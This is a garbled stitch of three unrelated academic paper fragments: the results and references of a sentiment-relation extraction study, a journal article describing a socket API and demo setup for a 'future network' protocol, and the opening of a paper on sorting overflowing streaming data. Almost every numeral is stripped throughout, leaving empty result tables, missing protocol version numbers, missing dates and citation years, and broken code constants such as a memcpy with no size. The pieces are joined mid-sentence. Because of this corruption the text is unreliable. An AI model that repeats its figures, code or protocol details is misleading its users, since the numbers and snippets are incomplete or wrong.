cross-validation only on the on-topic sentences in the evaluation dataset. since the same ssor can have several equivalent mrgs and the rela- tion type other is not of our interest, we evaluate the ssors in terms of precision, recall and f-measure. all reported numbers are averages over the folds. . results table shows the complete results of all sys- tems. here our model senti-lssvm outperformed all baselines in terms of the average f-measure scores and recalls by a large margin. the f-measure on movie reviews is about % over the best base- line. the rule-based system has higher precision than recall in most cases. however, simply increas- ing the coverage of the domain independent senti- ment polarity lexicon might lead to worse perfor- mance (taboada et al., ) because many sen- timent oriented relations are conveyed by domain dependent expressions and factual expressions im- plying evaluations, such as “this camera does not have manual control.” compared to ding-rule, senti-ssvm performs better in the camera domain but worse for the movies due to many misclassi- fication of negative relation instances as other. it also wrongly predicted more positive instances as other than senti-lssvm. we found that the recalls of these instances are low because they often have overly similar features with the instances of the type other linking to the same mentions. the problem gets worse in the movie domain since i) many sen- tences contain no explicit sentiment-bearing words; ii) the prior polarity of the sentiment-bearing words do not agree with their contextual polarity in the sentences. consider the following example from a forum post about the movie “superman returns”: “have a look at superman: the animated series or justice league unlimited . . . that is how the char- acters of superman and lex luthor should be.”. in contrast, our model minimizes the overlapping fea- tures by assigning them to the most likely relation candidates. this leads to significantly better per- formance. although senti-ssvm has low recall for both positive and negative relations, it achieves the highest recall for the comparative relation among all systems in the movie domain and camera reviews. since less than % of all instances are for compara- tive relations in these document sets and all models are trained to optimize the overall accuracy, senti- lssvm intends to trade off the minority class for the overall better performance. this advantage disap- pears on the camera forum posts, where the number of instances of comparative relation is times more than that in the other data sets. all systems perform better in predicting positive relations than the negative ones. this corresponds well to the empirical findings in (wilson, ) that people intend to use more complex expressions for negative sentiments than their affirmative counter- parts. it is also in accordance with the distribution of these relations in our srg corpus which is randomly sampled from the online documents. for learning systems, it can also be explained by the fact that the training data for positive relations are considerably more than those for negative ones. the comparative relation is the hardest one to process since we found that many corresponding expressions do not contain explicit keywords for comparison. to understand the performance of the key fea- ture groups in our model better, we remove each group from the full senti-lssvm system and eval- uate the variations with movie reviews and camera forum posts, which have relatively balanced distri- bution of relation types. as shown in table , the features from the sentiment predictors make signif- icant contributions for both datasets. the differ- ent drops of the performance indicate that the po- positive negative comparison micro-average p r f p r f p r f p r f c am er a fo ru m ding-rule . . . . . . . . . . . . senti-ssvm . . . . . . . . . . . . senti-lssvm . . . . . . . . . . . . c am er a r e- vi ew ding-rule . . . . . . . . . . . . senti-ssvm . . . . . . . . . . . . senti-lssvm . . . . . . . . . . . . m ov ie fo ru m ding-rule . . . . . . . . . . . . senti-ssvm . . . . . . . . . . . . senti-lssvm . . . . . . . . . . . . m ov ie r e- vi ew ding-rule . . . . . . . . . . . . senti-ssvm . . . . . . . . . . . . senti-lssvm . . . . . . . . . . . . table : evaluation results for ding-rule, senti-ssvm and senti-lssvm. boldface figures are statistically significantly better than all others in the same comparison group under t-test with p = . . feature models movie reviews camera forums full system . . ¬unigram . (+ . ) . (- . ) ¬context . (- . ) . (+ . ) ¬co-occurrence . (- . ) . (- . ) ¬senti-predictors . (- . ) . (- . ) table : micro-average f-measure of senti-lssvm with different feature models larities predicted by rules are more consistent in camera forum posts than in movie reviews. due to the complexity of expressions in the movie re- views our model cannot benefit from the unigram features but these features are a good compensation for the sentiment predictor features in camera fo- rum posts. the sharp drop by removing the context features from our model on movie reviews indicates that the sentiments in movie reviews depend highly on the relations of the previous sentences. in con- trast, the sentiment-oriented relations of the previ- ous sentences could be a reason of overfitting for camera forum data. the edge co-occurrence fea- tures do not play an important role in our model since the number of co-occurred sentiment-oriented relations in the sentences with contrast conjunctions like “but” is small. however, we found that allow- ing the co-occurrence of any sentiment-oriented re- lations would harm the performance of the model. in addition, our experiments showed that the sep- arated approach, which trains a model for senti- ment polarities and comparative relations respec- tively, leads to a decrease by almost % in terms of the f-measure averaged over all four datasets. the largest drop of f-measure is % on camera forum posts, since this dataset contains the largest propor- tion of comparative relations. we found that the er- rors are increased when the trained models make conflicting predictions. in this case, the joint ap- proach can take all factors into account and make more consistent decisions than the separated ap- proaches. conclusion we proposed senti-lssvm model for extracting in- stances of both sentiment polarities and comparative relations. for evaluating and training the model, we created an srg corpus by using a lightweight an- notation scheme. we showed that our model can automatically find textual evidences to support its relation predictions and achieves significantly bet- ter f-measure scores than alternative state-of-the-art methods. references yejin choi and claire cardie. . adapting a polarity lexicon using integer linear programming for domain- specific sentiment classification. in proceedings of the conference on empirical methods in natural language processing: volume - volume , emnlp ’ , pages – , stroudsburg, pa, usa. associa- tion for computational linguistics. yejin choi and claire cardie. . hierarchical se- quential learning for extracting opinions and their at- tributes. in proceedings of the annual meeting of the association for computational linguistics, pages – . association for computational linguistics. yejin choi, eric breck, and claire cardie. . joint extraction of entities and relations for opinion recog- nition. in proceedings of the conference on empirical methods in natural language processing, pages – , stroudsburg, pa, usa. association for compu- tational linguistics. jacob cohen. . weighted kappa: nominal scale agreement provision for scaled disagreement or par- tial credit. psychological bulletin, ( ): . xiaowen ding, bing liu, and philip s. yu. . a holistic lexicon-based approach to opinion mining. in proceedings of the international conference on web search and data mining, pages – , new york, ny, usa. acm. xiaowen ding, bing liu, and lei zhang. . entity discovery and assignment for opinion mining applica- tions. in proceedings of the acm sigkdd confer- ence on knowledge discovery and data mining, pages – . john duchi and yoram singer. . efficient online and batch learning using forward backward splitting. the journal of machine learning research, : – . murthy ganapathibhotla and bing liu. . mining opinions in comparative sentences. in proceedings of the nd international conference on computational linguistics - volume , pages – , stroudsburg, pa, usa. association for computational linguistics. namrata godbole, manjunath srinivasaiah, and steven skiena. . large-scale sentiment analysis for news and blogs (system demonstration). in proceed- ings of the international aaai conference on weblogs and social media. john e hopcroft and richard m karp. . an nˆ / algorithm for maximum matchings in bipartite graphs. siam journal on computing, ( ): – . minqing hu and bing liu. . mining and summa- rizing customer reviews. in proceedings of the tenth acm sigkdd international conference on knowl- edge discovery and data mining, proceedings of the acm sigkdd conference on knowledge discov- ery and data mining, pages – , new york, ny, usa. acm. wei jin, hung hay ho, and rohini k. srihari. . opinionminer: a novel machine learning system for web opinion mining and extraction. in proceedings of the th acm sigkdd international conference on knowledge discovery and data mining, pages – , new york, ny, usa. acm. nitin jindal and bing liu. . mining comparative sentences and relations. in proceedings of the st in- ternational conference on artificial intelligence - vol- ume , aaai’ , pages – . aaai press. richard johansson and alessandro moschitti. . extracting opinion expressions and their polarities– exploration of pipelines and joint models. in proceed- ings of the annual meeting of the association for com- putational linguistics, volume , pages – . jason s. kessler, miriam eckert, lyndsie clark, and nicolas nicolov. . the icwsm jdpa sent- ment corpus for the automotive domain. in th inter- national aaai conference on weblogs and social me- dia data workshop challenge (icwsm-dwc ). soo-min kim and eduard hovy. . extracting opin- ions, opinion holders, and topics expressed in online news media text. in proceedings of the workshop on sentiment and subjectivity in text, sst ’ , pages – , stroudsburg, pa, usa. association for computational linguistics. dan klein and christopher d. manning. . accurate unlexicalized parsing. in proceedings of the st an- nual meeting on association for computational lin- guistics - volume , acl ’ , pages – , strouds- burg, pa, usa. association for computational lin- guistics. lun-wei ku, yu-ting liang, and hsin-hsi chen. . opinion extraction, summarization and tracking in news and blog corpora. in aaai spring sympo- sium: computational approaches to analyzing we- blogs, pages – . bing liu, minqing hu, and junsheng cheng. . opinion observer: analyzing and comparing opinions on the web. in proceedings of the th international conference on world wide web, pages – , new york, ny, usa. acm. andré l. martins, noah a. smith, and eric p. xing. . concise integer linear programming formula- tions for dependency parsing. in proceedings of the annual meeting of the association for computational linguistics, pages – . ryan t. mcdonald, kerry hannan, tyler neylon, mike wells, and jeffrey c. reynar. . structured mod- els for fine-to-coarse sentiment analysis. in proceed- ings of the annual meeting of the association for com- putational linguistics. bo pang and lillian lee. . opinion mining and sentiment analysis. foundations and trends in infor- mation retrieval, ( - ): – . ana-maria popescu and oren etzioni. . extract- ing product features and opinions from reviews. in proceedings of the conference on human language technology and empirical methods in natural lan- guage processing, hlt ’ , pages – , strouds- burg, pa, usa. association for computational lin- guistics. lizhen qu, georgiana ifrim, and gerhard weikum. . the bag-of-opinions method for review rat- ing prediction from sparse text patterns. in chu-ren huang and dan jurafsky, editors, proceedings of the rd international conference on computational lin- guistics (coling ), acl anthology, pages – , beijing, china. tsinghua university press. lizhen qu, rainer gemulla, and gerhard weikum. . a weakly supervised model for sentence-level seman- tic orientation analysis with multiple experts. in joint conference on empirical methods in natural lan- guage processing and computational natural lan- guage learning (emnlp-conll), pages – , jeju island, korea, july. proceedings of the annual meeting of the association for computational linguis- tics. richard socher, brody huval, christopher d. manning, and andrew y. ng. . semantic compositionality through recursive matrix-vector spaces. in proceed- ings of the conference on empirical methods in natu- ral language processing, pages – . swapna somasundaran and janyce wiebe. . rec- ognizing stances in online debates. in proceedings of the joint conference of the th annual meeting of the association for computational linguistics and the th international joint conference on natural language processing of the asian federation of natural lan- guage processing, pages – . maite taboada, julian brooke, milan tofiloski, kim- berly d. voll, and manfred stede. . lexicon- based methods for sentiment analysis. computational linguistics, ( ): – . oscar täckström and ryan mcdonald. . discov- ering fine-grained sentiment with latent variable struc- tured prediction models. in proceedings of the rd european conference on advances in information re- trieval, ecir’ , pages – , berlin, heidelberg. springer-verlag. cigdem toprak, niklas jakob, and iryna gurevych. . sentence and expression level annotation of opinions in user-generated discourse. in proceedings of the th annual meeting of the association for computational linguistics, acl ’ , pages – , stroudsburg, pa, usa. association for computational linguistics. ioannis tsochantaridis, thomas hofmann, thorsten joachims, and yasemin altun. . support vec- tor machine learning for interdependent and structured output spaces. in proceedings of the international conference on machine learning, pages – . wei wei and jon atle gulla. . sentiment learn- ing on product reviews via sentiment ontology tree. in proceedings of the annual meeting of the association for computational linguistics, pages – . janyce wiebe, theresa wilson, and claire cardie. . annotating expressions of opinions and emotions in language. language resources and evaluation, ( - ): – . theresa wilson, janyce wiebe, and paul hoffmann. . recognizing contextual polarity in phrase-level sentiment analysis. in proceedings of the confer- ence on human language technology and empirical methods in natural language processing, hlt ’ , pages – , stroudsburg, pa, usa. association for computational linguistics. theresa ann wilson. . fine-grained subjectivity and sentiment analysis: recognizing the intensity, po- larity, and attitudes of private states. ph.d. thesis, university of pittsburgh. yuanbin wu, qi zhang, xuanjing huang, and lide wu. . structural opinion mining for graph-based sen- timent representation. in proceedings of the confer- ence on empirical methods in natural language pro- cessing, pages – . ainur yessenalina and claire cardie. . composi- tional matrix-space models for sentiment analysis. in proceedings of the conference on empirical methods in natural language processing, pages – . chun-nam john yu and thorsten joachims. . learning structural svms with latent variables. in pro- ceedings of the international conference on machine learning, page . ning yu and sandra kübler. . filling the gap: semi-supervised learning for opinion detection across domains. in proceedings of the fifteenth conference on computational natural language learning, pages – . association for computational linguistics. international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - design and research of future network (ipv ) api xu yinqiu shanghai decimal network information technology co. ltd. e-mail: @ .com xie jianping shanghai decimal network information technology co. ltd. e-mail: @ .cn abstract—socket is a way of process communication, that is used it to invoke some api function to realize the distribution network libraries in different host of data exchange between the relevant process. according to the tcp/ip protocol assigned to the network address of the local host, to communicate between the two processes, the host must know the other's location first, that is, the ip of the other host. at the same time, to get the port number, it is used to identify the local communication process; a local process in communication will occupy a port number, different process port number is different, so it must be assigned a port number that is not used before communication. a complete inter-network process consists of two processes and should use the same high-level protocol. ipv is the most important part of future network. this paper introduces the interface function and socket of ipv , which lays a foundation for further network application programming. keywords -ipv ; interface; socket; api i. interface and socket the transport layer implements end-to-end communication, so there are two terminals for each transport layer connection. what is the terminal of the transport layer connection? it is neither the host, nor the host's ip address, and not the application process, not the transport layer protocol port. the terminal to which the transport layer connects is called a socket. according to the definition of rfc , the port number is spliced to the ip address to form a socket. a socket is actually a communication endpoint, an interface between an application and a network protocol. each socket has a socket number, including the ip address of the host and a -bit host port number, such as (host ip address: port number). in short, socket is equals to (ip address: port number), which is represented by a decimal ip address followed by a port number, separated by a colon or comma. each transport layer connection is uniquely identified by two terminals (that is, two sockets) at each end of the communication. for example, if the ipv address is . . . and the port number is , the resulting socket is ( . . . : ), if the ipv address is [ [ ] . . . and the port number is , the resulting socket is ( [ [ ] . . . : ). a socket can be thought of as a terminal in the communication connection between two network applications. during communication, a piece of information to be transmitted by one of the network applications is written into the socket of its host, which sends the piece of information to the socket of another host through the transmission medium of the network interface, so that the piece of information can be transmitted to other programs. therefore, the data transfer between the two applications is done through the socket. during network application design, ipv can be realized through the programming interface of tcp/ip provided by the system, since the core content of tcp/ip is encapsulated in the operating system. all clients and servers of tcp-based socket programming begin with calling a socket, which international journal of advanced network, monitoring and controls volume , no. , returns a socket descriptor. the client then calls the connect function, while the server calls the bind (), listen (), and accept () functions. the socket is usually closed by using the standard close function, but it can be also used the shutdown function to close the socket. the socket interaction flow is shown in figure . figure . the socket interaction flow ii. ipv socket in the linux environment of ipv , the core contents of tcp /ip are encapsulated in the operating system kernel. in order to support user development of application-oriented communication programs, most systems provide a set of application programming interfaces (api) based on tcp or udp , which are usually presented in the form of a set of functions, also known as sockets. these sockets are described below. this document is the ipv protocol experimental application development instructions, non-industry standard documents. a. socket a socket is an abstraction layer through which applications can send or receive data and open, read, and close it as if it were a file.sockets allow applications to plug i/o into the network and communicate with other applications in the network. this version of network sockets supports a combination of ipv , ipv , and ipv addresses and ports. ) head file #include<sys/types.h> #include<sys/socket.h> ) prototype int socket(int domain, int type, int protocol); ) description socket: creates and returns a communication sleeve interface handle. the parameter domain describes the communication domain, that is, the select communication protocol family. these communication protocol families are defined in the header file international journal of advanced network, monitoring and controls volume , no. , <sys/socket.h>. currently supported protocol families are as follows:  pf_unix,pf_local(local communication protocol)  pf_inetipv (protocol)  pf_inet (ipv protocol)  pf_inet (ipv protocol)  pf_ipxnovell (protocol)  pf_netlink(core user interface device)  pf_x itu-t x. (protocol)  pf_ax ax. (protocol)  pf_atmpvc(access to the original atm pvcs)  pf_appletalkappletalk  pf_packet(low-level envelope interface ) the parameter type is used to describe the communication semantics. currently defined types are as follows:  sock_stream it provides sequential, reliable, duplex, connection-based byte streams that can also support out-of-band data transfer.  sock_dgram it supports datagram (connectionless, unreliable messages of fixed maximum length).  sock_seqpacket it provides a sequential, reliable, duplex, connection-based data path for datagram of fixed maximum length.  sock_raw it provides original network protocol access.  sock_rdm it provides a reliable datagram layer that does not guarantee order. some sets of interface types are not implemented on all protocol families, such as the sock seqpacket is not implemented in the af_inet protocol family the parameter protocol describes a special protocol for the socket interface. there is usually only one simple protocol that can support a particular set of interface types that contain a given family of protocols. of course, sometimes when multiple protocols exist that must be specified with this parameter. ) returned value - is returned value when an error occurs, and errno represents the error type value. otherwise, the socket interface handle value is returned。 b. bind () bind () is a local address to a set of interfaces function. this function is suitable for unconnected datagram or stream class interfaces and is used before connect () or listen () calls. when a socket () is created, it exists in a namespace (address family) but is not named. the bind () function establishes a local binding (host address/port number) for the socket interface by assigning a local name to an unnamed socket interface. ) head file #include<sys/types.h> #include<sys/socket.h> ) prototype bind(intsockfd, structsockaddr *my_addr, socklen_taddrlen); ) description bind() provides the local address my_addr for the socket interface handle, the length of my_addr is the parameter addrlen, which is called set interface name assignment. in general, a socket interface of type sock_stream must call bind() to assign a local address in order to connect and receive. international journal of advanced network, monitoring and controls volume , no. , the structure of the assignment is also different for different protocol families. such as for af_inet is sockaddr_in and af_inet is sockaddr_in . ) returned value return on success. the error returns - , and errno represents the error type value. c. connect () connect () is used to establish a connection to the specified socket。 ) head file #include <sys/types.h> #include<sys/socket.h> ) prototype connect (intsockfd, conststructsockaddr *serv_addr, socklen_taddrlen); ) description the handle sockfd must point to a socket interface. if the type of the socket interface is sock_dgram, the address represented by the parameter serv_addr is the default destination address of the datagram and the source address when the datagram is received. if the socket interface is of type sock_stream or sock_seqpacket, the call attempts to establish a connection to another socket interface. the other interface is described by the serv_addr parameter, which is the address of interface communication spaces, each of which interprets the serv_addr parameter. typically, connection-based protocols only successfully connect once; connectionless interfaces may connect multiple times to change sessions. a connectionless interface may also connect to an address whose family of protocols is af_unspec to cancel the session. ) returned value return on success. the error returns - , and errno represents the error type value. d. listen () it is used to create a socket interface and listen for the requested connection. ) head file #include <sys/types.h> #include<sys/socket.h> ) prototype int listen(int s, int backlog); ) description to confirm the connection, the socket is called to create a socket interface, and the listen () describes the willing to confirm the connection and the length limit of the connection queue before calling accept to confirm the connection. the listen () call only works on the socket interfaces of types sock_stream and sock_seqpacket. the parameter backlog defines the maximum length of the unconnected queue. ) returned value return on success. the error returns - , and errno represents the error type value. e. accept () it is used to create a socket interface and monitoring for the requested connection. ) head file #include <sys/types.h> #include<sys/socket.h> ) prototype int accept(int s, structsockaddr *addr, socklen_t *addrlen); ) description the accept function can be used based on the socket interface type of the connection (sock_stream, sock_seqpacket, and sock_rdm). it selects the first connection request in international journal of advanced network, monitoring and controls volume , no. , the unconnected queue, creates a new connected socket interface similar to the parameter s, and then assigns a handle to that socket interface and returns. the newly created socket interface is no longer in the listening state, and the source socket interface s is not affected by the call. ) returned value the error returns - , and errno represents the error type value. successfully returns a non-negative integer, representing the handle to the socket interface. f. select () it is used for monitoring three socket interfaces. ) head file #include <sys/time.h> #include <sys/types.h> #include <unistd.h> ) prototype int select(int n, fd_set *readfds, fd_set *writefds, fd_set *exceptfds, structtimeval*timeout); fd_clr(intfd, fd_set *set); fd_isset(intfd, fd_set *set); fd_set(intfd, fd_set *set); fd_zero(fd_set *set); ) description select () allows to monitoringthe three socket interface at the same time: readfds, writefds and exceptfds. the socket interface in the readfds will be listened for acceptable characters; the socket interface in writefds will be monitored to see if data can be sent immediately. the socket interface in exceptfds will be monitored for exceptions. four macros are defined to manipulate the set of socket interfaces: fd_zero will empty a set; fd_set and fd_clr add or remove a handle from the set. fd_isset is used to test whether a handle is in the set. the parameter n should be equal to the value of the highest file descriptor plus . the timeout parameter defines the maximum interval for the select call to block until it returns. it can be zero, so that select returns directly. if the timeout structure pointer is null, select will block the indeterminate time. ) returned value on success, return the socket interface handle contained in the socket interface set, returns if no change occurs after the maximum interval. - is returned on error, and errno represents the error type value g. recv (), recvfrom(), recvmsg() ) head file #include <sys/types.h> #include<sys/socket.h> ) prototype intrecv(int s, void *buf, size_tlen, int flags); intrecvfrom(int s, void *buf, size_tlen, int flags, structsockaddr *from, socklen_t *fromlen); intrecvmsg(int s, structmsghdr *msg, int flags); ) description the recvfrom() and recvmsg() calls are used to receive information from a socket interface, regardless of whether the socket interface is connection-oriented. if the from () parameter is not null, then the socket interfaces is not connection-oriented and the source address of the message is assigned to it. the fromlen parameter starts with the data buffer size of the parameter from and returns the buffer size of the actual storage address in the parameter from. international journal of advanced network, monitoring and controls volume , no. , a recv () call is usually used in a connected socket interface, this is equivalent to the case where the parameter from is null when recvfrom is called. if the data message is successfully received, the return value is the length of the data message. if the length of the data message exceeds the length of the data buffer, the excess is discarded, depending on the type of socket interface used to receive the message. if the socket interface does not receive the information, it will always wait for the information unless the socket interface is non-blocking. when the socket interface is non-blocking, the return value is - and the errno value is eagain. the recvmsg call the msghdr structure, defined in the header file <sys/socket.h>. ) returned value the length of the received data is returned on success, - is returned on error, and errno represents the value of the error type. h. send(), sendto(), sendmsg() ) head file #include <sys/types.h> #include<sys/socket.h> ) ( ) prototype intsend(int s, const void *msg, size_tlen, int flags); intsendto(int s, const void *msg, size_tlen, int flags, conststructsockaddr *to, socklen_ttolen); intsendmsg(int s, conststructmsghdr *msg, int flags); ) description the send (), sendto, and sendmsg calls are used to transfer information to other interfaces. the send () call applies only to the connection-oriented socket interface, while the sendto and sendmsg calls apply to all situations. the destination address is set by the parameter to, its length is the parameter tolen, and the length of the message is represented by the parameter len. if the length of the message is too large to be sent all at once by the low-level protocol, - is returned, and errno is set to emsgsize. if the length of the send message is greater than the length of the socket interface send buffer, the send call will normally block unless the socket interface is set to a non-blocking mode. in non-blocking mode - is returned and errno is set to eagain. the select call can determine whether more data can be sent. the structure msghdr is defined in the header file <sys/socket.h>. ) returned value the length of the sent data is returned on success, - is returned on error, and errno represents the value of the error type. i. ioctl() ) head file #include <sys/ioctl.h> ) prototype intioctl(int d, intrequest, ...); ) description ioctl( ) calls operate on the parameters of the underlying device. parameter d is the file handle, and the parameter request determines the type and size of the back parameters. see the <sys/ioctl.h> for the macro definition used to describe the parameter request. ) returned value is returned on success, - is returned on error, and errno represents the error type value. international journal of advanced network, monitoring and controls volume , no. , j. getsockopt(),setsockopt() ) head file #include <sys/types.h> #include<sys/socket.h> ) prototype intgetsockopt(int s, intlevel, intoptname, void *optval, socklen_t *optlen); intsetsockopt(int s, int level, intoptname, const void *optval, socklen_toptlen); ) description the getsockopt() and setsockopt() calls can operate on the options of the socket interface. options exist at multiple protocol levels, but are always represented at the highest socket interface level. when socket interface options are setting, it must be specify the level name and option name. for the socket interface level option, the level is called sol_socket. for other levels of protocol, other protocol control numbers are provided, such as the tcp protocol, and the level name must be the tcp series. the parameters optval and optlen are used when setsockopt calls access option values. for the getsockopt calls, they are buffers that return the request option value; the optlen parameter starts with the size of the buffer optval, and returns with the buffer size of the actual return value. if no option value can be returned, the parameter optval is set to null. the optname and option parameters are sent to the appropriate core protocol module for interpretation without explanation. in the header file <sys/socket.h>, there is a detailed definition of the socket interface level and option structure, and the option formats and names for different protocol levels vary greatly. most interface-level options take an integer value as the parameter optval, and for setsockopt calls, the parameter must be non-zero to support boolean options, or zero to disable. in the design of ipv stream label, the following call can be used: int on = ; struct in _flowlabel_req freq; structin _addrdst_addr; memcpy(&(freq.flr_dst),&dst_addr, ); freq.flr_label = htonl( x f); freq.flr_action = ipv _fl_a_get; freq.flr_share = ipv _fl_s_excl; freq.flr_flags = ipv _fl_f_create; freq.flr_expires = ; freq.flr_linger = ; freq.__flr_pad = ; setsockopt(s, ipproto_ipv , ipv _flowinfo_send, &on, sizeof(int)); setsockopt(s, ipproto_ipv , ipv _flowinfo, &on, sizeof(int)); setsockopt(s, ipproto_ipv , ipv _flowlabel_mgr, &freq, sizeof(structin _flowlabel_req)); the above code sets the stream label of socket s to f, where the destination address of the stream label is defined in dst_addr. structure in flowlabelreq is defined as follows struct in _flowlabel_req{ struct in _addrflr_dst; __u flr_label; __u flr_action; __u flr_share; __u flr_flags; __u flr_expires; __u flr_linger; international journal of advanced network, monitoring and controls volume , no. , __u __flr_pad; }; ) returned value is returned on success, - is returned on error, and errno represents the error type value. iii. ipv development instruction ) development environment centos operating system with linux operating environment with ipv kernel; vmware virtual machine image:: centos _ ipv _ dev_vm. the compiled program copy in centos _ipv _dev_vm virtual machine image, it can run normally, provides the virtual machine application development and compilation environment, c language headers file and ipv _linux kernel. ) ipv network application development directory: /develop development document directory: /develop /docs the demo directory: /develop /test demo readme /develop /test /readme ) test program the test program mainly changes the socket family program file. cd /develop /test make ) demo operation #configure the ipv address ifconfig eth add [ [ [ ] #start the ipv server program: /test _tcpserver #start the ipv client program: /test _tcpcli [ [ [ ] verify the caught: tcpdump -s -i any -w t.cap, or wireshark with ipv plugin open t.cap. iv. conclusion this paper introduces the commonly used socket able and interface functions, including creating a socket, binding function, link function, monitoring function and accept function, read the function and writing function, etc., each function is connected the header files, prototyping, description, and the return value, these are the basis of network programming, mastering these functions, which plays a major role for application development. references [ ] https://zh.wikipedia.org/wiki/berkeley%e %a % %e % e%a % e %ad% , wikipedia: berkeley sockets - - , (goodheart , p. ), (goodheart , p. ) [ ] cisco networking academy program, ccna and companion guide revised [ ] third edition, p. , isbn - - - [ ] jack wallen ( - - ). "an introduction to the ss command". [ ] v. s. bagad, i. a. dhotre ( ), computer networks ( th revised edition, ed.), technical publications pune, p. [ ] ian griffiths for iang on tap. august, . raw sockets gone in xp [ ] "raw( ): ipv raw sockets - linux man page". die.net. [ ] "raw ip networking faq". faqs.org. [ ] www- .ibm.com - anynet guide to sockets over sna [ ] books.google.com - unix network programming: the sockets networking api [ ] books.google.com - designing bsd rootkits: an introduction to kernel hacking [ ] historyofcomputercommunications.info - book: . tcp/ip and xns - [ ] mit.edu - the desktop computer as a network participant.pdf correct and stable sorting for overflow streaming data with a limited storage size and a uniprocessor correct and stable sorting for overflow streaming data with a limited storage size and a uniprocessor suluk chaikhan, suphakant phimoltares and chidchanok lursinsap advanced virtual and intelligent computing (avic) research center, department of mathematics and computer science, faculty of science, chulalongkorn university, bangkok, thailand abstract tremendous quantities of numeric data have been generated as streams in various cyber ecosystems. sorting is one of the most fundamental operations to gain knowledge from data. however, due to size restrictions of data storage which includes storage inside and outside cpu with respect to the massive streaming data sources, data can obviously overflow the storage. consequently, all classic sorting algorithms of the past are incapable of obtaining a correct sorted sequence because data to be sorted cannot be totally stored in the data storage. this paper proposes a new sorting algorithm called streaming data sort for streaming data on a uniprocessor constrained by a limited storage size and the correctness of the sorted order. data continuously flow into the storage as consecutive chunks with chunk sizes less than the storage size. a theoretical analysis of the space bound and the time complexity is provided. the sorting time complexity is o (n), where n is the number of incoming data. the space complexity is o (m), where m is the storage size. the experimental results show that streaming data sort can handle a million permuted data by using a storage whose size is set as low as % of the data size. this proposed concept can be practically applied to various applications in different fields where the data always overflow the working storage and sorting process is needed. subjects algorithms and analysis of algorithms, artificial intelligence, data science keywords algorithms, sorting, memory, algorithm design and analysis, computational intelligence introductions currently, the growth of data consumption by internet users has exponentially increased (laga et al., ; bey ahmed khernache, laga & boukhobza, ), and a massive storage size is required to store all incoming data to avoid any data loss in case of storage overflow (thusoo et al., ; katal, wazid & goudar, ; witayangkurn, horanont & shibasaki, ; mehmood et al., ). however, many applications such as data management, finance, sensor networks, security-relevant data, and web search possibly face this unexpected situation of a storage overload issue (lee et al., ; babcock et al., ; keim, qu & ma, ; cardenas, manadhata & rajan, ; dave & gianey, ). this issue induces the problem of representing big data with a limited storage size. furthermore, some primitive operations such as the classic sorting algorithms (e.g., quick how to cite this article chaikhan s, phimoltares s, lursinsap c. . correct and stable sorting for overflow streaming data with a limited storage size and a uniprocessor. peerj comput. sci. :e doi . /peerj-cs. submitted october accepted december published february corresponding authors suluk chaikhan, suluk.c@student.chula.ac.th suphakant phimoltares, suphakant.p@chula.ac.th academic editor marcin woźniak additional information and declarations can be found on page doi . /peerj-cs. copyright chaikhan et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:suluk.�c@�student.�chula.�ac.�th mailto:suphakant.�p@�chula.�ac.�th https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ sort, heap sort) cannot be implemented due to the restrictive constraint of storing all sorted data inside the storage during the sorting process. a sorting algorithm is the first important step of many algorithms (cormen et al., ; huang, liu & li, ) such as searching and finding a closest pair (singh & sarmah, ; tambouratzis, ). generally, when referring to data storage of a computer, it can be either primary storage (internal storage) or secondary storage (external storage). the size of primary storage is much smaller than that of the secondary storage. with reference to the size of storage, there are two types of sorting: internal sort and external sort. all data to be sorted by an internal sorting algorithm must be entirely stored inside the primary storage. some of traditional internal sorting algorithms are bubble sort, insertion sort, quick sort, merge sort, and radix sort. however, if the data overflow the primary storage, the overflow must be stored in the secondary storage. in this case, external sort algorithms can be employed. although these classic sorting algorithms are very efficient in terms of time and space complexities, the actual quantity of data generated yearly on the internet has grown tremendously faster than the growth rate of storage capacity based on the current fabrication technology (for both primary storage and secondary storage). this severe condition makes the classic sorting algorithms, where all data must be stored inside the computer, very inefficient because all overflowed data are lost. in this study, both internal and external storage are viewed as one unit of storage with a limited size. this size is not gradually augmented during the sorting process of continuously incoming data. the challenging problem to be studied is how to sort the data under the constraints of limited storage capacity and storage overflow. the data are assumed to flow into the storage as a sequence of data chunks with various sizes less than or equal to the storage size. recently, many internal sorting algorithms have been remodeled by reducing comparison, swapping, and the time complexity to reduce the sorting time. farnoud, yaakobi & bruck ( ) proposed an algorithm that sorts big data based on limited internal storage, but the result is a partial sort. concoms sort (agrawal & sriram, ) is an algorithm that uses a swapping technique with no adjacent swapping. it reduces the execution time in some cases when compared to selection sort and outperforms bubble sort in every case. in particular, in the case that the input is a descending sequence, concoms sort is more efficient than both traditional algorithms. mapping sort (osama, omar & badr, ) is a new algorithm that does not use comparisons and the swapping technique but it uses the mapping technique instead. this algorithm achieved the worst case time complexity of o(n) + o(n log n). vignesh & pradhan ( ) proposed a sorting algorithm by improving merge sort. it uses multiple pivots to sort data. the execution time of this algorithm is better than quick sort and merge sort in the best case and the average case, respectively. in addition, proximity merge sort (franceschini, ) was proposed by improving the algorithm with an in-place property. faro, marino & scafiti ( ) modified insertion sort to reduce the time complacency by inserting multiple elements for one iteration. the time complexity is oðn þ hÞ, where h n. idrizi, rustemi & dalipi ( ) modified the sorting algorithm by separating the data sequence into three chaikhan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ parts, namely, negative numbers, zero numbers, and positive numbers. after the data in each part are sorted by printing the result, the algorithm can decrease the comparison by a separating process. bidirectional conditional insertion sort algorithm (mohammed, amrahov & Çelebi, ) is a two-pivot insertion sort algorithm using the left comparator and right comparator. it is faster than insertion sort, and the time complexity is nearly close to o(n . ). brownian motus and clustered binary insertion sort methods (goel & kumar, ) are algorithms that adapted insertion sort and binary insertion sort to reduce the comparison and the execution time. both algorithms are suitable for sorting partial data. internal sorting algorithms in the literature have focused on reducing the time for processing, but the storage issue for big data has been ignored. presently, accessing a large piece of information or big data is simple because of rapid technological advancements such as the cloud (al-fuqaha et al., ; kehoe et al., ; vatrapu et al., ) and network technology (yiliang & zhenghong, ; zhao, chang & liu, ; zhai, zhang & hu, ). one of the issues for sorting big data is the restricted internal storage, which is usually smaller than the size of big data. all big data cannot be stored in the internal storage. therefore, the internal sorting algorithms cannot sort big data at one time. the external sorting algorithms are developed from the classic merge sorting algorithm to sort big data, which is separated into two phases: ( ) the sorting phase sorts a 